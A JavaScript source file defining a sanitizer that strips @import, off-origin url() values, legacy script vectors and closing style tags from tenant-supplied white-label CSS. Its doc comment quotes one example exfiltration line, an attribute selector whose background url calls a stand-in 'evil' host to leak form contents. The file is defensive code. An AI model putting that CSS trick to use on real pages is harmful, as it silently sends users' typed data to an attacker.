/**
 * Defence-in-depth filter for tenant-authored white-label CSS.
 *
 * `custom_css` comes from a clinic's white-label settings and is injected
 * verbatim into a <style> tag, so it runs with the app's origin. The authors
 * are authenticated clinic owners rather than anonymous users, which puts
 * this well below "untrusted input" — but CSS is still a live exfiltration
 * channel, and a compromised or careless tenant account shouldn't be able to
 * phone home from every clinician's browser.
 *
 * What this blocks:
 *   - `@import` — pulls in a remote stylesheet wholesale.
 *   - `url(...)` pointing off-origin — the classic attribute-selector trick
 *     (`input[value^="a"] { background: url(//evil/a) }`) leaks form contents
 *     one request at a time. Relative and `data:` URLs are kept, so a tenant
 *     can still reference their own uploaded assets.
 *   - `javascript:` / `expression(...)` — legacy script-in-CSS vectors.
 *   - `</style` — closing the tag early to escape into markup.
 *
 * What this does NOT do: it is not a CSS parser, and it cannot stop a tenant
 * from restyling the app misleadingly (a fake banner, a hidden control).
 * Treat it as a speed bump. The durable fix is server-side validation at save
 * time plus a Content-Security-Policy `style-src` on the served app.
 *
 * @param {unknown} css
 * @returns {string} CSS safe enough to inject, or '' when there's nothing left
 */
export function sanitizeCustomCss(css) {
  if (typeof css !== 'string' || !css.trim()) return ''

  let out = css

  // Kill any attempt to break out of the <style> element.
  out = out.replace(/<\/\s*style/gi, '')

  // Remote stylesheet pulls.
  out = out.replace(/@import\b[^;]*;?/gi, '')

  // Legacy script vectors.
  out = out.replace(/expression\s*\(/gi, '(')
  out = out.replace(/javascript\s*:/gi, '')

  // url(...) — keep relative paths and data: URIs, drop anything that
  // resolves to another host (absolute, protocol-relative, or a bare scheme).
  out = out.replace(/url\(\s*(['"]?)([^'")]*)\1\s*\)/gi, (match, _quote, target) => {
    const value = target.trim()
    if (!value) return 'none'
    if (/^data:/i.test(value)) return match
    if (/^(https?:)?\/\//i.test(value)) return 'none'
    if (/^[a-z][a-z0-9+.-]*:/i.test(value)) return 'none'
    return match
  })

  return out.trim()
}
